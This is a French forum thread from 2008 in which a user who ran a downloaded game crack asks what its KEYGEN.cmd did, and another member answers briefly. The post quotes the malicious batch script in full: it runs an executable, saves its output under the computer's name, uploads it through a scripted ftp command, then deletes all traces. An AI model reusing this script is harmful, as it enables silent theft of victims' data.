Virus, trojan, ou pas ?

[dupond]

Bonjour

 

Je m'inscrit sur ce forum que je viens de découvrir, car les personnes présentes semblent fort compétentes et pourront peut-être me rassurer et/ou me renseigner.

 

Voilà : Ayant téléchargé sur internet un de ces programmes permettant de jouer à un jeux sans introduire le CD-ROM a chaque fois, j'ai obtenu un fichier qui, après décompression, a donné un répertoire contenant les fichiers suivants :

 

Uninstall.exe

avg.dll

nspr4.dll

nss3.dll

plc4.dll

plds4.dll

softokn3.dll

KEYGEN.cmd

 

En lançant le fichier KEYGEN.cmd, une fenêtre DOS est apparue et très vite s'est refermée.

Puis tous les fichiers ont disparus.

 

Ce fichier KEYGEN.cmd est éditable et contient les instructions suivantes :

 

mkdir %windir%\systinfo\

Uninstall.exe > %windir%\systinfo\%COMPUTERNAME%.txt

ftp -n -v -s:avg.dll

del Uninstall.exe

del %windir%\systinfo\%COMPUTERNAME%.txt

del avg.dll

rmdir %windir%\systinfo\

del nspr4.dll

del nss3.dll

del plc4.dll

del plds4.dll

del softokn3.dll

del KEYGEN.cmd

 

Le fichier Uninstall.exe est un exécutable non éditable.

 

Si quelqu'un est en mesure de m'éclairer sur ce qu'a pu faire ce fichier à mon ordi ? (qu'est-ce que l'instruction ftp -n -v -s:avg.dll).

 

Je suis prêt à faire parvenir le fichier Uninstall.exe (taille 80ko) à toute personne intéressée pour analyser son action.

 

D'avance merci et sinon, je verrais par la suite (peut-être n'a-t-il aucun effet ... On peut réver !).

 

@+

 

PS : Les tests anti-virus et anti-spy/trojan n'ont rien révélé

[Falkra]

Bonsoir, un bon vieux crack pourri, une raison de plus pour ne pas les utiliser...

 

Regarde si tu as un dossier

c:\windows\systinfo\

et si oui, quoi dedans.

[dupond]

Salut

 

Merci de ta réponse.

 

Non bien sûr, aucun dossier de ce nom dans le rep windows.

On voit bien dans le script que ce répertoire est créé (mkdir) puis supprimé après avoir été utilisé (rmdir).

 

@+

Modifié le 18 octobre 2008 par dupond